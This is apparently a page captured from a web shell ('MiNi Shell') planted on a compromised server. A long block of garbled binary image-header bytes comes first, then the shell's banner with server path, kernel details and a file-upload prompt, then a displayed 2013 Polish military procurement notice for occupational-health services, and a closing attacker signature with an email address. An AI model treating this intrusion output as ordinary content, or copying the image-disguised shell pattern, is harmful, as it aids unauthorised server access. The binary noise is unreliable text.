JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131231/540938-N-2013.html

<p class="kh_header"><b>Dęblin: Świadczenie usług medycznych z zakresu medycyny pracy dla pracowników cywilnych wojska, kadry oraz jednostek i pododdziałów będących na jej zaopatrzeniu Nr 69/13/N</b><br>
<b>Numer ogłoszenia: 540938 - 2013; data zamieszczenia: 31.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 41 Baza Lotnictwa Szkolnego , ul. Brygady Pościgowej 5, 08-521 Dęblin, woj. lubelskie, tel. 81 551 75 25, faks 81 551 95 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.41blsz.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych z zakresu medycyny pracy dla pracowników cywilnych wojska, kadry oraz jednostek i pododdziałów będących na jej zaopatrzeniu Nr 69/13/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywne wykonywanie usług medycznych z zakresu medycyny pracy dla pracowników cywilnych wojska, kadry oraz jednostek i pododdziałów będących na zaopatrzeniu 41 Bazy Lotnictwa Szkolnego w Dęblinie. Szczegółowy opis przedmiotu zamówienia znajduje się poniżej oraz w załączniku Nr 1 do SIWZ tj formularzu ofertowym. 
2. Szacunkowa liczba osób, na rzecz których będą realizowane przedmiotowe usługi to 1000. 
3. Przedmiot zamówienia będzie realizowany zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy Dz. U. Nr 69, poz. 332, z późn. zm.. szczególności
a wykonywanie profilaktycznych badań lekarskich - wstępnych, okresowych i kontrolnych, zgodnie z tabelą nr 1
b wydawania orzeczeń lekarskich wymienionych w tabeli nr 1 do celów przewidzianych w Kodeksie pracy i przepisach wykonawczych;
c udzielanie konsultacji specjalistycznych zgodnie z tabelą nr 1
4. Wymagania Zamawiającego w stosunku do Wykonawcy.
a wykonawca musi mieć uprawnienia podstawowej jednostki medycyny pracy, określone w art. 2 ust. 2 ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy Dz. U. z 2004 r. nr 125, poz. 1317 z późn. zm.
b świadczenia zdrowotne będą wykonywane przez personel lekarski, pielęgniarski i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r. nr 69, poz. 332 z późn. zm.
c wykonawca zobowiązuje się udzielić świadczeń zdrowotnych zgodnie z przepisami ustawy z dnia 5 grudnia 1996 r. o zawodzie lekarza i lekarza dentysty  Dz. U. z 1997 r. nr 28, poz. 152 z późn. zm. oraz ustawy z 15 lipca 2011 r. o zawodach pielęgniarki i położnej Dz. U. z 2011 r. nr 174, poz. 1039 z późn. zm. z należytą starannością i ze wskazaniem aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami zapobiegania, rozpoznawania oraz zasadami etyki zawodowej, respektując prawa pacjenta - badanego
d gabinety, w których będą wykonywane usługi medyczne muszą spełniać standardy określone w rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej Dz. U. z 2011 r. nr 31, poz. 158 z późn. zm.
5.Bieżąca realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku od godz.7 00 do godz. 15 30.  
6. Organizacja świadczenia usług medycznych
Wykonawca przeprowadzi badania i konsultacje specjalistyczne na podstawie skierowania wystawionego przez Zamawiającego zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy Dz. U. Nr 69, poz. 332, z późn. zm
Badania wstępne i okresowe wykonywane będą w terminie nie dłuższym niż 7 dni roboczych licząc od daty zgłoszenia się osoby skierowanej na badania.
Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia stwierdzającego
1 brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy lub
2 przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy
Realizacja świadczeń odbywać się będzie na podstawie imiennych skierowań zawierających: nr PESEL pracownika cywilnego/żołnierza, rodzaj badania profilaktycznego jakie ma być wykonane lub konsultacji specjalistycznej, opisem zajmowanego stanowiska, nr JW Jednostki Wojskowej czynnikami szkodliwymi występującymi na stanowisku pracy, wystawionych przez lekarza upoważnionego przez Dowódcę 41 Bazy Lotnictwa Szkolnego w Dęblinie. 
Wykonawca zobowiązuje się do zapewnienia wykonywania badań na najwyższym poziomie zarówno pod względem obsługi ze strony personelu medycznego, jak i warunków lokalowych oraz świadczenia usług medycznych nieprzerwanie przez cały okres trwania umowy bez przerw urlopowych, chorobowych itp.
W przypadku nieobecności lekarza wykonującego konsultacje specjalistyczne Wykonawca w terminie 3 dni roboczych zobowiązany jest do wyznaczenia zastępstwa innego lekarza w swojej placówce, które umożliwi wykonanie świadczenia. 

7. Zamawiający powierzy Wykonawcy na podstawie art. 31 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. z 2002 r. nr 101, poz. 926 przetwarzanie danych osobowych pacjentów, przekazywanych wraz ze zleceniem, wyłącznie w celu wywiązania się Wykonawcy z obowiązków związanych z udzielanymi świadczeniami.

8. Zamawiający informuje, że rozliczenie z Wykonawcą dokonywane będzie na podstawie cen jednostkowych wskazanych w ofercie i ilości faktycznie wykonanych badań lub konsultacji specjalistycznych. 

9. Ceny jednostkowe badań oraz konsultacji medycznych będą stałe i niezmienne podczas całego okresu obowiązywania umowy. 


10. Zakres usług medycznych przedstawia tabela poniżej.


Tabela Nr 1

Lp.	Rodzaj badania lub konsultacji	Szacunkowa
ilość badań
KONSULTACJE  SPECJALISTYCZNE		
1.Konsultacja neurologiczna		400
2.Konsultacja ginekologiczna		40
3.Konsultacja dermatologiczna		100
4.Konsultacja psychologiczna  		74
5.Konsultacja okulistyczna		600
6.Konsultacja laryngologiczna		400
7.Konsultacja psychiatryczna		101
8Badania psychotechniczne dla kierowcy i wydanie orzeczenia przez psychologa posiadającego uprawnienia do badań pracowników  transportu		200
9.Badanie i wydanie orzeczenia przez lekarza posiadającego uprawnienia do orzekania kierowców		300
10Badania lekarskie wykonane przez lekarza posiadającego uprawnienia do orzekania pracowników ochrony fizycznej ubiegających się o wydanie licencji oraz posiadających licencję pracownika ochrony I i II (stopnia)wraz z wydaniem orzeczenia	100
11Badania psychologiczne wykonane przez psychologa posiadającego uprawnienia do orzekania pracowników ochrony fizycznej ubiegającym się o wydanie licencji oraz posiadających licencję pracownika ochrony I i II (stopnia) wraz z wydaniem orzeczenia 	
BADANIA LABORATORYJNE		
12.Morfologia krwi obwodowej z wzorem odsetkowym		1000
13.Odczyn opadania krwinek czerwonych OB.		400
14.Badanie ogólne moczu		1000
15.Cukier 		1000
16.Cholesterol całkowity		200
17Trójglicerydy		200
18.Cholesterol-HDL		50
19.Cholesterol-LDL		50
20.Bilirubina		200
21Aminotransferaza asparaginianowa (GOT-AST) 		200
22Aminotransferaza alaninowa (GPT-ALT)		200
23.Posiew kału w kierunku pałeczek Salmonella I Shigella (badania na nosicielstwo wykonane w Stacji Sanepidu)		30
24	GGTP		150
BADANIA  RADIOLOGICZNE  I DIAGNOSTYCZNE		
25.Rtg klatki piersiowej a-p 		1000
26.Spirometria		300
27.Audiometria		600

11. UWAGA !!! Zamawiający zastrzega, że wskazane w tabeli ilości badań i konsultacji medycznych są ilościami szacunkowymi, które służyć mają jedynie do skalkulowania ceny oferty, porównania i wyboru najkorzystniejszej oferty. Ilości badań mogą ulec zmniejszeniu lub zwiększeniu, jednakże ich wartość nie może przekroczyć kwoty umowy.
12. Podane ilości badań i konsultacji medycznych nie są ilościami wiążącymi 
i obowiązującymi. Wykonawca będzie realizować usługi medyczne sukcesywnie, 
w ramach potrzeb zamawiającego. W związku z powyższym ilości badań i konsultacji będą kształtować się odpowiednio w zależności od faktycznych potrzeb zamawiającego.
12. UWAGA !!! Zamawiający informuje, że ze względu na specyfikę przedmiotu zamówienia, przedmiotowe usługi muszą być świadczone na terenie miasta Dęblina.
13. Dodatkowe uwagi:
Zamawiający informuje, że wymaga aby świadczenia medyczne będące przedmiotem niniejszego zamówienia wykonywane były w siedzibie Wykonawcy. Wyjątkiem od tej reguły są badania na nosicielstwo, które jest wykonywane w Stacji Sanepidu materiał do badania będzie pobierany według zaleceń pracowników Stacji Sanepidu. Wynik wykonanego przez Stację Sanepidu badania wykonawca wyda osobie badanej w swojej siedzibie. 

Zamawiający informuje, że w przypadku kierowców kierowców zawodowych wymaga badań zarówno wstępnych jak i okresowych oraz wydania orzeczenia przez lekarza posiadającego uprawnienia do orzekania kierowców tzn. lekarza posiadającego dwie pieczątki jedną do badań profilaktycznych, drugą o treści Lekarz uprawniony do badań lekarskich osób kierujących pojazdami wydaną przez Wojewodę. 
Zamawiający informuje, że konsultacja psychologiczna ma być realizowana przez psychologa, zgodnie z wymaganiami określonymi w tabeli nr 1. Zamawiający nie wymaga konsultacji udzielanej przez psychologa klinicznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-8, 85.14.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy wykażą, że posiadają aktualny wpis do Rejestru Podmiotów Wykonujących Działalność Leczniczą prowadzonego przez Wojewodę właściwego dla siedziby albo miejsca zamieszkania podmiotu leczniczego, zgodnie z wymaganiami Ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej tekst jednolity: Dz. U. z dnia 2011 r. Nr 112, poz. 654.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełnienia tego warunku wymaga by Wykonawca oświadczył (wzór oświadczenia załącznik Nr 6 do SIWZ), że osoby, które będą uczestniczyć w realizacji przedmiotu zamówienia, tj. personel lekarski, pielęgniarski i inny, posiadają wymagane uprawnienia, w myśl ustawy o służbie medycyny pracy ( Dz. U. z 2004r. Nr 125, poz. 1317 z póź.zm.) oraz rozporządzeniu Ministra Zdrowia i Opieki Społecznej z 30.05.1996r. w sprawie prowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie  Wykonawcy (wzór oświadczenia załącznik Nr 6 do SIWZ), że osoby, które będą uczestniczyć w realizacji przedmiotu zamówienia, tj. personel lekarski, pielęgniarski i inny, posiadają wymagane uprawnienia, w myśl ustawy o służbie medycyny pracy ( Dz. U. z 2004r. Nr 125, poz. 1317 z póź.zm.) oraz rozporządzeniu Ministra Zdrowia i Opieki Społecznej z 30.05.1996r. w sprawie prowadzenia badań 
lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami.
1. Jeżeli Wykonawca przy realizacji przedmiotu zamówienia będzie polegał na wiedzy, doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, na zasadach określonych w art. 26 ust. 2 b ustawy, to w takim przypadku Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia, podpisane przez osoby upoważnione do re0prezentacji tych podmiotów. 2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsca zamieszkania, nie wydaje się dokumentów, o których mowa w części III. 4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Dokument ten musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3) W przypadku wykonawców działających przez pełnomocnika - pełnomocnictwo do podpisania oferty i jej załączników, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osoby(ę) nie wymienione (ą) w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo musi być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez notariusza lub osoby udzielające pełnomocnictwa w zakresie zgodności kopii z oryginałem i aktualności pełnomocnictwa. 4) Jeżeli zostanie wybrana oferta wykonawców wspólnie obiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy przedłożenia umowy reagującej ich współpracę np: (umowa spółki cywilnej, umowa konsorcjum) w zakresie obejmującym wykonanie zamówienia. Zaleca się aby z treści tej umowy wynikały w szczególności: zasady współdziałania, zakres współuczestnictwa i podział obowiązków w wykonaniu przedmiotu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą być dokonywane w zakresie dopuszczonym przez ustawę Prawo zamówień publicznych, wymagają zgodnej woli stron oraz zachowania formy pisemnej w postaci aneksu, pod rygorem nieważności w poniższym zakresie: 
1)	Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba - w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków; 
2)	gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub nowelizacji przepisów) lub z innych przyczyn o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę wymogów lub konieczne będzie spełnienie wymogów dodatkowych; 
3)	Zamawiający dopuszcza możliwość zmiany zakresu świadczeń medycznych 
w sytuacji potrzeby zaistniałej po stronie zamawiającego. W takim przypadku obowiązywać będą ceny jednostkowe zaproponowane przez Wykonawcę. Przedmiot umowy będzie realizowany do całkowitej wartości umowy, określonej w § 6 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.41blsz.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41 Baza Lotnictwa Szkolnego,08 521,Dęblin Lotnisko, bud. 205, (pokój nr 304 sekcja zam. publ.) w godzinach 7.30 15.30 lub pocztą po wpłacie 20 zł na konto 24 1010 1339 0016 1622 3100 0000..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 12:00, miejsce: 41 Baza Lotnictwa Szkolnego w Dęblinie, ul. Brygady Pościgowej 5, 08 521 Dęblin, Budynek Nr 226, pokój nr 7 - Kancelaria Jawna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com